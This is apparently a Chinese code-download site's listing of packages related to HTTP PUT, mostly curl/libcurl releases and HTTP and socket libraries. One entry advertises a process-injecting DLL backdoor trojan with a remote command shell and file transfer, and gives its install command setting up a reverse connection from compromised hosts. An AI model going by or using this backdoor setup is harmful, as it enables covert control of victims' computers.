搜索资源列表
HTTPClient
- This package provides a complete http client library. It currently implements most of the relevant parts of the HTTP/1.0 and HTTP/1.1 protocols, including the request methods HEAD, GET, POST and PUT, and automatic handling of authorization, redirecti
exe1
- ssd8 exercise 1 The purpose of this exercise is to build a simple Web client and a simple Web server—a server that responds only to the HTTP GET and PUT commands.
050615adminchick-backdoor
- 注入进程的 超强DLL后门木马 支持系统 2000以上, 功能: 1.支持密码验证 2.cmd命令 3.上传下载 安装: 要用到的程序. install.exe 和 ServerDll.dll 在CMD下 运行 install -h http://www.donews.net/xxx/archive/2004/09/26/110321.aspx -p 1234567 -h 后面接的是一个网页的地址。网页里面包含自己的IP和端口,肉鸡读到后,会进行反弹连接 -p 后面是认证密码 在静态网页中,必须
GenericHTTPClient
- 使用wininet封装的类,实现了HTTP协议的GET POST PUT报文,同时可以接收服务器的响应报文。提供了具体的使用例子。 -This class is used for HTTP REQUEST. It supports HTTP GET, HTTP POST and HTTP POST-MultiPartFormData
Eff_STL_CN2
- Effevtive_STL 本书是对STL的一些原理和一些使用STL过程中经常放的一些错误进行分析,讲解,很不错的一本书,推荐看 http://www.laixp.cn/soft/sort01/sort02/down-11235.html http://www.laixp.cn/soft/sort01/sort02/down-12267.html -Effevtive_STL this book is some of the principle of STL and some use
w3c-libwww-5.4.0
- www工具包. 这是W3C官方支持的www支撑库. 其中提供通用目的的客户端的WebAPI: complete HTTP/1.1 (with caching, pipelining, PUT, POST, Digest Authentication, deflate, etc), MySQL logging, FTP, HTML/4, XML (expat), RDF (SiRPAC), WebDAV, and much more-Libwww is a highly modular, gene
libcurl-7.19.3-win32-ssl-msvc
- LibCurl是免费的客户端URL传输库,支持FTP,FTPS ... Libcurl具备线程安全、IpV6兼容、易于使用的特点,支持多种平台-libcurl is a free and easy-to-use client-side URL transfer library, supporting FTP, FTPS, HTTP, HTTPS, SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS and FILE. libcurl supports SSL c
curl-7.19.5-win32-nossl-sspi
- curl源代码,crul为功能强大的文件传输的命令行工具,支持ftp、http等-curl is a command line tool for transferring files with URL syntax, supporting FTP, FTPS, HTTP, HTTPS, SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS and FILE. curl supports SSL certificates, HTTP POST, HTTP PUT,
synapse_r38
- synchronyous套接字。文件的内容:1。)关于突触2。)分发包3。)安装说明4。)使用说明Synapse的公司网址是http://synapse.ararat.cz/在公司网址是文档系统和维基其它信息。1。)关于突触突触库的目的是创建类和功能,从而显着简化应用程序的网络通信编程使用Winsock完整的图书馆。2。)分发包包装必须与子目录解。目前这些derectories:\的HTML -遥Synapse的支持Web的在线版本\来源-突触的源代码\源\ Lib -共享单位\源\示范- Sy
httpput
- This example shows a HTTP PUT operation. PUTs a file given as a command line argument to the URL also given on the command line.
Sockets-2.3.9.1
- C++ Sockets 是一个跨平台的 Sockets 库,实现包括 TCP、UDP、ICMP、SCTP 协议。已实现的应用协议包括有 SMTP、HTTP(S)、Ajp (1.3)。具有 SOCKS 客户端实现以及匿名 DNS ,支持 HTTP 的 GET/POST/PUT 以及 WebServer 的框架。-his is a GPL licensed C++ class library wrapping the berkeley sockets C API, and therefore wor
hsrex
- 用http的put协议上传的例子第一步就是需要在iis管理器里面设置“写”权限,可以是根目录,也可以是虚拟目录 第二步就是需要在放上传文件的那个目录的NTFS权限设置中,添加IU_USER(Internet匿名访问用户)的写权限。 -利用winInet实现文件上传到HTTP服务器
curl-7.25.0
- libcurl主要功能就是用不同的协议连接和沟通不同的服务器~也就是相当封装了的sockPHP 支持libcurl(允许你用不同的协议连接和沟通不同的服务器)。, libcurl当前支持http, https, ftp, gopher, telnet, dict, file, 和ldap 协议。libcurl同样支持HTTPS证书授权,HTTP POST, HTTP PUT, FTP 上传(当然你也可以使用PHP的ftp扩展), HTTP基本表单上传,代理,cookies,和用户认证。-libc
curl-7.26.0
- curl的作用:curl是一个利用URL语法在命令行方式下工作的文件传输工具。 它支持很多协议:FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE 以及 LDAP。curl同样支持HTTPS认证,HTTP POST方法, HTTP PUT方法, FTP上传, kerberos认证, HTTP上传, 代理服务器, cookies, 用户名/密码认证, 下载文件断点续传,上载文件断点续传, http代理服务器管道( proxy tunneling),
HTTP_PUT_socket
- 通过Socket把封装好的XML数据发送给MySQL,文件为自己用C写了HTTP的PUT方法-The package good through Socket XML data sent to MySQL, files for their own use C wrote the HTTP PUT method
http
- http请求的四个方法,包括post、get、put、delete-four methods http request, including post, get, put, delete
curl-7.32.0.tar
- curl是利用URL语法在命令行方式下工作的开源文件传输工具。它被广泛应用在Unix、多种Linux发行版中,并且有DOS和Win32、Win64下的移植版本。 -curl is a command line tool for transferring data with URL syntax, supporting DICT, FILE, FTP, FTPS, Gopher, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, R
curl-7.40.0
- curl-7.40.0 版本源码,支持VC6 到VC12的编译, Curl 支持协定众多的文件传输程序,可下载FTP,HTT,HTTP,GOPHE,TELNET,DICT,FILE,LDAP的文件,还可以上传HTTP POST,HTTP PUT,FTP uploading,HTTP form based upload,proxies,cookies。 编译成 DLL 、LIB 后能极大方便通信程序的开发。-Curl-7.40.0 version of source code, suppo
curl-7.54.0.tar
- curl 软件包,可用于配置并行环境,并行编程,OPENMPI(curl supports SSL certificates, HTTP POST, HTTP PUT, FTP uploading, HTTP form based upload, proxies, HTTP/2, cookies, user+password authentication)
dictionary-server-node-js
- 这是一款简单的 Node.js HTTP Server 服务器,使用 ES6 模块编写,内部框架使用了 Koa、Koa Router、Realm 和 Tracer。其中 Koa 和 Koa Router 作为基础服务框架,Realm 是数据库框架,Tracer 是日志记录框架。服务主要提供了以下几种 GET 和 PUT 功能:1.检索单字,用于展示详情,主要接收 character(文字);2.检索字符集,主要用于展示列表,接收两种参数,分别是 radical/strokes(部首和笔画)和 d